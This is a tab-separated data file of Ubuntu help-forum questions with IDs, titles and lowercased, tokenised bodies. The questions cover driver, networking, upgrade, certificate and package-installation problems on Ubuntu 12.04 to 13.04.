289377	trouble with python 3.3 in ubuntu 13.04	i 'm consistently getting eof when reading a line errors on when running : list0 = [ ] inputtedstr = input ( ) while inputtedstr ! = `` # # # # # '' : list0.append ( inputtedstr ) inputtedstr = input ( ) print ( ) print ( `` original list : `` , list0 ) list1 = [ ] for i in range ( 0 , len ( list0 ) ) : if str.strip ( list0 [ i ] ) ! = str.strip ( list0 [ i-1 ] ) : list1.append ( str.strip ( list0 [ i ] ) ) else : continue print ( ) print ( `` no duplicates : `` , list1 ) this runs find when i run it in a windows terminal , any suggestions as to what i may be doing wrong will be greatly appreciated ! also , this is not the first time i 've gotten this error only when running on ubuntu machine ?
289381	internet is extremely slow on ubuntu ; fine on windows ?	i have a desktop i am dual-booting with windows/ubuntu . in windows , i 'm getting around 8-12 mb/s , and in ubuntu i 'm currently getting ~.1 mb/s . i have a belkin f7d1101 usb wireless adapter . i have the latest version of ubuntu installed . i 'm not really sure what other information would be needed in order to help me , so comment if you need some info on my system .
289386	upgrading fails from 12.10 to 13.04 ( check internet settings )	i am unable to upgrade from 12.10 to 13.04 . it fails with the error message : check your internet settings my internet is working and i am able to browse the internet , see emails , etc .
289391	xubuntu 13.04 - mobile broadband can not be enabled	i installed xubuntu 13.04 and lubuntu 13.04 ; not together ( dual boot ) but one by one . for both , i experienced the same issue . my notebook is acer ao532h . i want to use xubuntu or lubuntu on it . previouly , i installed xubuntu 12.10 on ao532h and i could use prolink hspa modem , a cdma phone as modem , and nokia e63 as modem on that xubuntu 12.10 without any issue . then , i clean-installed xubuntu 13.04 . i selected the option to remove the previous version of ubuntu variant ( xubuntu 12.10 ) . after installation , xubuntu 13.04 worked fine with broadband mobile connection by using those 3 devices as the modems . i could visit some sites , etc . then , by using the cdma phone as the modem , i updated xubuntu 13.04 . i selected all recommended items and the update process worked without any issue . after updating , software updater said the computer must be restarted , so i did that . after xubuntu being restarted , i found out that the 3 devices can not be used for mobile broadband connection . they are detected but i can not turn on the broadband connection . if i type `` lsusb '' in terminal , the devices are in the list . i can also make a new connection ( select the device and the isp to be used as well as the correct setting ) . all the settings of devices and isp which worked before updating os , now do not work after updating os . yesterday , i installed lubuntu 13.04 . it was also a clean-intallation ; i removed xubuntu 13.04 . the issue is the same . before updating lubuntu 13.04 , there was no problem with mobile broadband connection . after updating lubuntu 13.04 , the issue appeared . could you suggest me any solution for this issue ? thank you .
289394	internal pci motorola sm56 modem does n't work on ubuntu 13.04 32 bits with smartlink drivers	i have an internal pci motorola sm56 modem . until ubuntu 12.10 i was able to make it work on 32 bits by installing packages sl-modem-source , sl-modem-daemon , dkms and gnome-ppp ( with all the dependencies ) and smartlink drivers were able to make the modem work . now , after installing ubuntu 13.04 32 bits in the same pc , same modem ( it works fine on other oses ) now the modem now does n't work on ubuntu 13.04 . what changed ? what can i do to make my modem work on ubuntu 13.04 ?
289395	why does installing updates always lose the wireless connection	regardless if it 's an update , or new release upgrade download , upon system restart the wireless connection gets dropped and no wireless network search is performed or access point listed in the drop down menu under the network icon . is there a fix , or procedure i can follow to retrieve my wireless connection , or is a fresh install of the ubuntu image disk required ?
289396	does guest account work like a vm ( virtual machine ) ?	if guest session creates the entire user and everything , when running , then erases it all . it sounds like a vm instance , turning on and then turning off/logging out . is it ?
289397	hyperlinks in received emails always open same document from desktop . how to fix ?	hyperlinks in received emails always open same document from desktop . how do i get links to open in firefox ?
289402	extra animation plugins are missing in compizconfig settings manager ! ( ubuntu 13.04 )	i installed compiz-plugins-extra , expecting to enable animation effects like explode and window blur . but the extra plug-ins are n't shown in compizconfig settings manager . is there any way to get them ?
289404	problems on boot ubuntu 13.04 , kernel version 3.8.0 with uefi	few days ago i upgraded my ubuntu 12.10 to ubuntu 13.04 version on my np300e5c samsung notebook with ssd . i reloaded ubuntu few times and everything has gone well , but after a complete shutdown i restarted my notebook and , loading kernel version 3.8.0 , it hangs on black screen and ubuntu can not load . it works only selecting kernel version 3.5.0 ; i do n't have a dual boot . i boot ubuntu with uefi boot-loader embedded in my samsung pc . please help me , it is my working pc and is very important to have all things working fine for my job . thanks for your time
289412	more elaborate manual installation instructions	i 'm on another platform than ubuntu , but would like to test ubuntu touch on a nexus 7 . the manual installation instructions at https : //wiki.ubuntu.com/touch/install use adb - but does not work for me . would it be possible to add fastboot instructions , or access to the phablet-flash scripts ?
289414	rtl8723ae driver problem , ubuntu 13.04	i 've bought a new notebook with rtl8723ae wifi chip ( or at least it looks like ) $ lspci | grep rtl 03:00.0 network controller : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter windows also shows rtl8723ae in the device manager . at the moment , i have windows 7 and ubuntu 13.04 installed . when i use wifi with windows booted , everything goes ok , router shows stable signal about -60 dbm and link speed 135-150 mbit/s . download speed seems ok . but when i am in ubuntu with the same distance/walls to the router , download speed jumps from 0 to good , router shows signal ~ -80 dbm ( with the same notebook vs router placement ! ) and link speed jumping randomly from 1 mbps to ~54 mbps . stable link with 135-150 mbps and signal -60 dbm under ubuntu is achievable only with the notebook at a 30 cm distance to router . any longer distance or my body between the router and notebook drops signal dramatically . iwconfig reports txpower 20 dbm : $ iwconfig eth1 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' zyxel_keenetic_lite_3efa9b '' mode : managed frequency:2.457 ghz access point : c8:6c:87:3e : fa:9b bit rate=150 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=70/70 signal level=-14 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:28819 missed beacon:0 reducing it to 0 dbm with sudo iwconfig wlan0 txpower 0 seem to have no effect . signal level reported by iwconfig seem to jump randomly from -90 to +15 dbm ( or even once maybe i 've seen +26 dbm , not sure ) . at a close distance ( ~30 cm ) iwconfig reportes -30 dbm most of the time , but sometimes jumps to something ramdom ( +10 dbm , -70 dbm , -90 dbm ... ) also , at a longer distance -60 dbm seems to be more likely to be reported by iwconfig , but random jumps are more often and it 's hard to say for sure . everything seems like a transmitter power or signal correctness problem . but in windows everything goes ok. may be , the driver does not work with the chip correctly , but works somehow . the kernel module rtl8723ae seems to be loaded : $ lsmod | grep rtl87 rtl8723ae 86459 0 rtlwifi 79673 1 rtl8723ae it there anything i can do with this ? the notebook was bought for use with ubuntu mainly , but with such a wifi it is not quite usable = (
289416	eclipse does n't open in dash ubuntu 12.04	i installed eclipse following these instructions : how to install eclipse ? now when i go to dash home and type eclipse . there is a white file but clicking on it does n't do anything . then i opened home folder and searched for eclipse and it showed a bunch of folders . i clicked on the one where only `` eclipse '' is written and in there was a purple file named eclipse . clicking on it opened java ee - eclipse . on the left side there is now a file with a question mark on it and it says `` eclipse '' when going with the mouse over it . since the searching through the home folder takes some time i ask for a quicker method to access eclipse .
289424	openssl not picking up cas in certs folder	we 're having trouble with curl not connecting to an https server : $ curl https : //the-problem-site.com ( not the real url ! ) curl : ( 35 ) error:14077458 : ssl routines : ssl23_get_server_hello : reason ( 1112 ) 1112 is ssl_r_tlsv1_unrecognized_name in ssl.h . if i try openssl s_client -connect the-problem-site.com:443 instead then i see connected ( 00000003 ) depth=1 /c=us/o=geotrust , inc./cn=geotrust ssl ca verify error : num=20 : unable to get local issuer certificate verify return:0 certificate chain 0 s : /serialnumber=xx/c=xx/st=xx/l=xxxx/o=xx/ou=xx/cn=the-problem-site.com i : /c=us/o=geotrust , inc./cn=geotrust ssl ca 1 s : /c=us/o=geotrust , inc./cn=geotrust ssl ca i : /c=us/o=geotrust inc./cn=geotrust global ca i.e . it looks like the problem is that it does n't trust /c=us/o=geotrust inc./cn=geotrust global ca . however that cert is installed : it 's /etc/ssl/certs/geotrust_global_ca.pem , and if instead i run openssl s_client -connect the-problem-site.com:443 -cafile /etc/ssl/certs/geotrust_global_ca.pem then everything works . the cert is also present as a hash-named file b0f3e76e.0 and it 's in ca-certificates.crt . however , as far as i can see , neither curl nor openssl are attempting to read any certificates ; if i strace them then there 's no attempt to read from /usr/lib/ssl/certs or /etc/ssl/certs at all , not even with errors . it does read openssl.cnf though . we have run update-ca-certificates . this is ubuntu 10.04 with openssl 0.9.8k . we can reproduce the problem on two separate installs ( though it 's possible one 's a clone of the other from way back ) . if i try the same test on a centos vm with openssl 0.9.8e then it works fine , and i can see it reading the certificate file in strace . there 's no equivalent file access at the same point in the ubuntu straces . if i copy the openssl.cnf file from the centos vm to the ubuntu machines it makes no difference . there 's nothing obvious in the environment or an .rc file that might be causing this . any ideas what i 'm doing wrong ? should this work , i.e . should openssl and curl pick up installed cas automatically from the command-line ? how is this configured ? thanks ! another data point : on a clean install of 13 server , curl does pick up the certificates file and work fine . openssl s_client still does not , though . why would that be ?
289429	problem with installing tor on ubuntu 12.04	i tried to install tor in terminal by : sudo apt-get install tor and this is the output : > reading package lists ... done building dependency tree reading state information ... done tor is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up tor ( 0.2.2.35-1 ) ... raising maximum number of filedescriptors ( ulimit -n ) to 32768 . starting tor daemon : tor ... aborted : tor configuration invalid : may 02 12:31:09.978 [ notice ] tor v0.2.2.35 ( git-73ff13ab3cc9570d ) . this is experimental software . do not rely on it for strong anonymity . ( running on linux i686 ) may 02 12:31:09.978 [ warn ] failed to parse/validate config : unknown option 'clienttransportplugin ' . failing . may 02 12:31:09.978 [ err ] reading config failed -- see warnings above . invoke-rc.d : initscript tor , action `` start '' failed . dpkg : error processing tor ( -- configure ) : subprocess installed post-installation script returned error exit status 255 dpkg : dependency problems prevent configuration of tor-geoipdb : tor-geoipdb depends on tor ( > = 0.2.2.35-1 ) ; however : package tor is not configured yet . dpkg : error processing tor-geoipdb ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : tor tor-geoipdb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so , can anyone help me to fix it plz ! ? : | thanx @ mrseed ! i tried to remove by : sudo apt-get remove tor and the output : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : tor tor-geoipdb 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 6,361 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 396092 files and directories currently installed . ) removing tor-geoipdb ... removing tor ... stopping tor daemon : not running ( there is no /var/run/tor/tor.pid ) . processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for man-db ... and then install again by : sudo apt-get install tor and output : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : tor-geoipdb suggested packages : mixmaster xul-ext-torbutton socat tor-arm polipo privoxy the following new packages will be installed : tor tor-geoipdb 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/1,868 kb of archives . after this operation , 6,361 kb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously unselected package tor . ( reading database ... 396065 files and directories currently installed . ) unpacking tor ( from ... /tor_0.2.2.35-1_i386.deb ) ... selecting previously unselected package tor-geoipdb . unpacking tor-geoipdb ( from ... /tor-geoipdb_0.2.2.35-1_all.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... setting up tor ( 0.2.2.35-1 ) ... raising maximum number of filedescriptors ( ulimit -n ) to 32768 . starting tor daemon : tor ... aborted : tor configuration invalid : may 02 19:54:07.679 [ notice ] tor v0.2.2.35 ( git-73ff13ab3cc9570d ) . this is experimental software . do not rely on it for strong anonymity . ( running on linux i686 ) may 02 19:54:07.679 [ warn ] failed to parse/validate config : unknown option 'clienttransportplugin ' . failing . may 02 19:54:07.679 [ err ] reading config failed -- see warnings above . invoke-rc.d : initscript tor , action `` start '' failed . dpkg : error processing tor ( -- configure ) : subprocess installed post-installation script returned error exit status 255 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of tor-geoipdb : tor-geoipdb depends on tor ( > = 0.2.2.35-1 ) ; however : package tor is not configured yet . dpkg : error processing tor-geoipdb ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : tor tor-geoipdb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) unfortunately the same error ! : ' (
289439	spotify plugin has disappeared in the clementine music player on ubuntu 13.04	i have a premium spotify account and wish to use this account via the clementine music player 1.1.1. program . but when i go to the configure spotify tab in that program , the plugin is stated as not installed and there 's also no option to do so . can you please advise ?
289446	how to install d-link 502t on a desktop	i have installed ubuntu 12.04 and have been trying to install and configure d-link usb router 502t . i tried following various posts available on internet but no luck . can anyone help ?
289453	no mouse options in `` mouse & touchpad '' panel	i 've recently installed ubuntu 13.04 ( new install ) . the control panel `` mouse & touchpad '' has only two options : `` primary button '' and `` double-click '' . google shows me that other users have much more options in this panel . what can i do to make them available ? i 'm currenty using microsoft comfort mouse 4500 .
289455	pulseaudio-equalizer wo n't start	hey i have a huge problem , pulseaudio-equalizer_2.7.0.2-2 wo n't start after clicking it , actually it does n't do anything at all . it worked well on ubuntu 12.10 but now , after reinstalling fresh copy of ubuntu 13.04 it installs fluently but does not do anything else , no errors no pop-ups , nothing , what should i do to make it work ? maybe i need to install some kind of packages ? as i mentioned before i 'm using ubuntu 13.04 ( 32 bit )
289459	nvidia drivers installed , but not used	i have an asus ul30jt . it has nvidia optimus technology which i am not really interested in . i currently rarely use this laptop with it being connected to power . and i want to be able to play video at high res , play games and do some opencl coding . in the bios i switched it to nvidia only ( non windows 7 ) . previously , this worked just fine , using the nvidia driver . after upgrading everything was broken . i have added nomodeset and blacklist.nouveau=1 as kernel options . the nvidia drivers install without error . however they are not found/used . jockey-text -l kmod : nvidia_310_updates - nvidia_310_updates ( proprietary , enabled , not in use ) kmod : nvidia_304_updates - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) kmod : nvidia_313_updates - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) kmod : nvidia_310 - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) kmod : nvidia_304 - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) trying to load the module manually fails as well . sudo modprobe nvidia fatal : module nvidia not found . xorg.0.log show the following : [ 12.028 ] loading extension glx [ 12.028 ] ( ii ) loadmodule : `` nvidia '' [ 12.037 ] ( ww ) warning , could n't open module nvidia [ 12.037 ] ( ii ) unloadmodule : `` nvidia '' [ 12.037 ] ( ii ) unloading nvidia [ 12.037 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 12.037 ] ( == ) matched nvidia as autoconfigured driver 0 [ 12.037 ] ( == ) matched nouveau as autoconfigured driver 1 [ 12.037 ] ( == ) matched vesa as autoconfigured driver 2 [ 12.037 ] ( == ) matched modesetting as autoconfigured driver 3 [ 12.038 ] ( == ) matched fbdev as autoconfigured driver 4 [ 12.038 ] ( == ) assigned the driver to the xf86configlayout [ 12.038 ] ( ii ) loadmodule : `` nvidia '' [ 12.038 ] ( ww ) warning , could n't open module nvidia [ 12.038 ] ( ii ) unloadmodule : `` nvidia '' [ 12.038 ] ( ii ) unloading nvidia [ 12.038 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 12.038 ] ( ii ) loadmodule : `` nouveau '' [ 12.039 ] ( ww ) warning , could n't open module nouveau i have installed the kernel headers , of the correct kernel . i verified that the kernel options are in the grub configuration . i have purged all nvidia packages and tried to reinstall ( multiple times ... ) currently i am at a loss . i have checked the following question : nvidia driver installation error but nothing there worked for me .
289460	upgraded to 13.04 , command not found errors	i 'm getting command not found errors on all my scripts i try to run since upgrading . for instance if i navigate to a directory in terminal and then try to execute a script i receive this error . the scripts do have executable permissions . i did mess around with my path at one point , i do n't know if i 've messed it up somehow ? # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin '' fi update if i run the scripts with `` bash '' in current dir in the terminal the scripts run i.e . bash myscript , however without it i still get command not found error . would this imply bash is no longer in my path ? if so how do i fix this ? results of echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games
289462	can not correct locale settings	i am running an ubuntu image provided by my company , it seemed to have some strange locale settings to begin with . firefox uses the french dictionary by default and i get warnings when doing anything with ssh ( git pull/push and normal ssh sessions ) . those warnings look like this : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lc_paper = `` en_gb.utf-8 '' , lc_address = `` en_gb.utf-8 '' , lc_monetary = `` en_gb.utf-8 '' , lc_numeric = `` en_gb.utf-8 '' , lc_telephone = `` en_gb.utf-8 '' , lc_identification = `` en_gb.utf-8 '' , lc_measurement = `` en_gb.utf-8 '' , lc_time = `` en_gb.utf-8 '' , lc_name = `` en_gb.utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . i have been trying to set my locale to en_gb.utf-8 using information i have found on places such as askubuntu.com but i ca n't get it to work . my current /etc/default/locale file contains the following . lang= '' en_gb '' language= '' en_gb : en '' and here is the result of my locale command . lang=en_gb.utf-8 language=en_gb : en lc_ctype= '' en_gb.utf-8 '' lc_numeric=en_gb.utf-8 lc_time=en_gb.utf-8 lc_collate= '' en_gb.utf-8 '' lc_monetary=en_gb.utf-8 lc_messages= '' en_gb.utf-8 '' lc_paper=en_gb.utf-8 lc_name=en_gb.utf-8 lc_address=en_gb.utf-8 lc_telephone=en_gb.utf-8 lc_measurement=en_gb.utf-8 lc_identification=en_gb.utf-8 lc_all= does anyone have any idea what can be set to correct this ? thanks .
289463	transfering a file with cat changes it	i am trying to transfer some video from a embedded linux + camera to my computer through an usb cable . what i am doing is cat file > /dev/ttygs0 on the card side and cat /dev/ttyacm0 > file on the computer file . the file is different after the transfer . i tried to generate the same file on both sides ( numbers from 1 to 10000 , 1 by line ) and transfer the one on the card to my pc . here is what od -x gives me : head transferedfile -n 10 | od -x 0000000 0d31 320a 0a0d 0d33 340a 0a0d 0d35 360a 0000020 0a0d 0d37 380a 0a0d 0d39 310a 0d30 000a 0000037 head originalfile -n 10 | od -x 0000000 0a31 0a32 0a33 0a34 0a35 0a36 0a37 0a38 0000020 0a39 3031 000a 0000025 the hexadecimal code is different . it looks like the transfer adds 0d symbols ( cr , carriage return ) to the file . do you know why ? do you know how to get the exact file after transfer ? thanks .
289467	can i install ubuntu on a older laptop with a intel pentium processor ( which does n't have pae ) ?	i currently have ubuntu 11.10 , and i finally decided to upgrade . so i downloaded the .iso file from the site ( ubuntu 13.04 , 32 bit ) , and put it on a 2gb thumb drive . i booted from the thumb drive , and it gave the error message : this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu . i saw a post suggesting that i use update manager , but i do n't want to end up downloading the update , then when its half way through the install process , my computer might crash , and then i would lose all my data etc ( i do n't know if that is a proper assumption , because i do n't know much about ubuntu ) ... can i use the minimal cd talked about it https : //help.ubuntu.com/community/installation/minimalcd ? i do n't want to mess anything up with a stupid mistake , so thanks for the help . ( btw , i have a dual boot with windows xp and ubuntu 11.10 , if that makes any difference ) . i also understand that this is similar to the question asked in ca n't install 12.04 server under intel pentium m , but my processor is : intel速 pentium ( r ) m processor 1.10ghz
289468	install non-linux games via steam	is it possible to install non-linux games on ubuntu via steam ? i have some games on my account and i hoped to run them via wine . but steam did n't let me to download them . i 've tried to use virtual machine with windows on it ( virtualbox ) , but there is a problem with drivers and i got crash shortly after starting game ( torchlight 2 ) no worries , i understand that i wo n't be able to play skyrim that way , but i have some older games that i would love to play from time to time
289472	which kernels from ubuntu 3.5.0 can i remove ?	after reading some very helpful information on your forums , i now know how to remove unneeded kernels to free up disk space for updates . can any of you tell me which of the following i can safely uninstall ? -rw-r -- r -- 1 root root 834k oct 9 2012 abi-3.5.0-17-generic -rw-r -- r -- 1 root root 834k nov 13 18:19 abi-3.5.0-19-generic -rw-r -- r -- 1 root root 837k dec 11 19:26 abi-3.5.0-21-generic -rw-r -- r -- 1 root root 837k jan 8 22:11 abi-3.5.0-22-generic -rw-r -- r -- 1 root root 837k jan 24 13:34 abi-3.5.0-23-generic -rw-r -- r -- 1 root root 839k feb 7 06:02 abi-3.5.0-24-generic -rw-r -- r -- 1 root root 839k feb 25 19:32 abi-3.5.0-25-generic -rw-r -- r -- 1 root root 839k mar 8 23:49 abi-3.5.0-26-generic -rw-r -- r -- 1 root root 841k mar 25 20:29 abi-3.5.0-27-generic i have already removed 3.5.0-17-generic as , after a brief search , i found it was tagged as deleted .
289473	any way to tabulate the package name and license avail on ubuntu repo ?	i need to create a table with all installable packages on first column and its license in the second . e.g . : gedit | gpl
289477	ubuntu 12.04 update fail	i tried to update ubuntu via manager next to the clock and it asked me to restart . i rebooted and got a blank purple screen . now when i select ubuntu at startup ( dual boot ) , it loads , but the screen flashes with odd colors and shows two mouse pointers , the password screen does some weird warp-around effect .
289478	unclear sound on ubuntu	i own an asus k55vm running ubuntu 13.04 with updated alsa and pulseaudio . the sound on my laptop is clearly unclear at 100 % volume on all applications . the sound was clear on windows . i think it uses alc270 sound card . any help would be great
289481	how do i install and configure huawei mobile broadband usb modem ?	i 'm using ubuntu 12.10 , and have a zantel modem ( model : huawei ec122 ) which is a cdma 1x evdo modem . i have been trying to connect to the internet but every time it loads it says `` network disconnected '' ( huawei mobile broadband model : huawei ec122 cdma 1x evdo )
289487	compiz uses 80-85 % of cpu while idle	i installed ubuntu 13.04 earlier . installation went on smoothly but after i successfully installed it , it became so sluggish ! i checked it using system monitor and found out that compiz uses 80-85 % while idle but the memory it uses does n't surpass more than 20 % . my netbook 's specs : intel atom n2100 ( 1.6ghz x 2 ) , intel gma 3150 , 2gb of ram . i disabled all effects and animation using unity-tweak-tool and ccsm but i do n't see any improvement in performance . what can i do ? thanks .
289490	low battery life on ubuntu 13.04	config : laptop msi cr650 - 229xby amd e-450 radeon hd 6320 ( 512mb ) - proprietary driver hdd : 500gb os : windows 7 home premium sp1 ( x64 ) and ubuntu 13.04 raring ringtail ( x64 ) steps : 1.clear install ubuntu 13.04 2 . launch os 3 . launch skype and opera 12.15 4 . light web-surfing ar : the notebook from the battery in ubuntu works 2-3 times less er : the notebook working time from the battery in ubuntu shall be comparable time working in windows windows 7 sp1 ( x64 ) ~4 hours ubuntu 13.04 ( x64 ) ~ 1.5 -2 hours **screenshot ~90 % battery : **screenshot ~10 % battery : tbd
289496	13.04 | sd card reader not mounting properly	when i put in an sd card into the reader , i get the following error message : unable to access `` 8 gb volume '' error mounting /dev/mmcblk0p1 at /media/samir/0000-45cc : command-line `mount -t `` vfat '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush '' `` /dev/mmcblk0p1 '' `` /media/samir/0000-45cc '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/mmcblk0p1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i have a hp dv6-7101tx . i tried installing the realtek card drivers but got an error at while using `` make '' in the terminal . i used the pcie rts5229 card reader driver for linux from : http : //www.realtek.com.tw/downloads/downloadsview.aspx ? langid=1 & pnid=15 & pfid=25 & level=4 & conn=3 & downtypeid=3 & getdown=false lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 650m / gtx 660m le ] ( rev a1 ) 08:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 0a:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) 0b:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 07 ) i used the readme which told me to go to the directory and use make , then make-install and then depmod this is what i got with make : cp -f ./define.release ./define.h make -c /lib/modules/3.8.0-19-generic/build/ subdirs= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' hostcc scripts/basic/fixdep hostcc scripts/kconfig/conf.o hostcc scripts/kconfig/zconf.tab.o hostld scripts/kconfig/conf scripts/kconfig/conf -- silentoldconfig kconfig make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' make [ 2 ] : *** no rule to make target `/usr/src/linux-headers-3.8.0-19-generic/arch/x86/syscalls/syscall_32.tbl ' , needed by `arch/x86/syscalls/../include/generated/uapi/asm/unistd_32.h ' . stop . make [ 1 ] : *** [ archheaders ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make : *** [ default ] error 2 not sure where to go from here . i tried looking at other answers but they seem to be for other models of the card reader .
289501	ubuntu 13.04 no sound from via vt8233 ... 12.04 was the same	m/b has sound jacks as per usual but vga card has a hdmi port , does this complicate things ?
289504	disable unknown ftp server	i am sitting in front of a ubuntu 12.4. which is running an sftp server , that i want to stop / disable . the problem is that i do n't know what the name of the ftp sever is . how do i find that out program is providing the sftp sever ? [ update ] it seems like vsftd is not installed : $ sudo apt-get -s install vsftpd reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : vsftpd 0 upgraded , 1 newly installed , 0 to remove and 3 not upgraded . inst vsftpd ( 2.3.5-1ubuntu2 ubuntu:12.04/precise [ amd64 ] ) conf vsftpd ( 2.3.5-1ubuntu2 ubuntu:12.04/precise [ amd64 ] )
289505	two gateways on the same network ( 10.12.15.20 and 10.12.15.21 ) - is there a way to combine them into single bonded internet connection ?	i have two gateways to internet on the same network . ubuntu is installed on server with only one ethernet card . is there a way to create a bonding of this two gateways from the same network where i have only one ethernet card ? i was trying to add virtual ethernet alias ( `` auto eth0:1 '' ) but it is not being recognised in bonding configuration which i 've found here https : //help.ubuntu.com/community/ubuntubonding . any ideas ? regards
289510	how to build ubuntu touch in 32-bit computer	i was trying to port ubuntu touch for my htc incredible s. i had setup the source code and drivers . during build , i am getting error that the build can be executed only on 64-bit computer . when i searched for my laptop model spec , i found that it is 32-bit . what is the restriction in building on 32-bit machine ? is there a possibility to build it on 32-bit . thanks in advance .
289511	switch from parallel to ubuntu only	i 'm currently running ubuntu in parallel with windows 7 . i 'm tired of windows 7 . i have all my files on an external hard drive and my plan was to just move them to the ubuntu partition , but apparently there 's limited space on the parallel version of ubuntu ... ? is that right ? if so , what do i need to do to trash windows and start from scratch ?
289513	network simulators to simulate a mail server in ubuntu 12.04	im looking for a simulator that can simulate a mail server in ubuntu ? i would like to see the working of a mail server
289514	how to completely remove a gnome shell extension ?	i 'm running gnome-shell 3.4.1 under ubuntu 12.04 . i 've been trying out various extensions from http : //extensions.gnome.org and now i want to completely remove some , expecially so as they do n't take up space in gnome tweak tool . is it safe to just delete the extension folder under ~/.local/share/gnome-shell/extensions/ ?
289520	amd driver 13.4 error in ubuntu 12.04	i 'm using ubuntu 12.04 and amd 6470m ( laptop ) , i install lastest amd driver on my ubuntu ( amd 13.4 ) but i ca n't decrease or increase display bridgness , i check in detail ( on system setting ) and i see the grapic is `` unknown '' . anybody can help me ? ( laptop asus a44 core i3-2330m amd radeon 6470m )
289521	set wireless network as preferential	i have a problem i 'm not sure how to ( or even if it 's possible to ) solve in linux ( i 'm using ubuntu ) . i need to make sure that , if there are two or more available wireless networks i have access to , linux will always connect to network-x . what happens to me is that linux connects to the one with the strongest signal or to the one that fulfills the criteria it things is better , exactly what i do n't want . basically , if network-x is available , always connect to network-x . thanks
289524	how to execute some commands while background task of bash script is about to be killed	in case i run a script in terminal and it contains a background job , in case the user close the terminal as i guess the script with his all back ground tasks will be dead , i want something like an event when the job is about to be killed or terminated , to excecute some block of code for instance : while sleep 3h do background job commands done those above is the back ground job i want when i already pressed exit on the terminal who run the script in background and when this job is about to exist and killed to do some other commands before get terminated the whole script something like events in c # for example when something happen a block of code get executed i hope i explained myself abundantly clear this time thanks in advance : )
289531	microsoft office , programs	im using microsoft windows operating system and i want to try the ubuntu but i want to ask : should all drivers will be installed ? can i used program like microsoft office ? and when i send it to windows it will work ? does the ubuntu system faster then windows ? can i install games programs ? on exe format ? what the format used in ubuntu ? ? does ubuntu have yahoo.skype. ? thanks
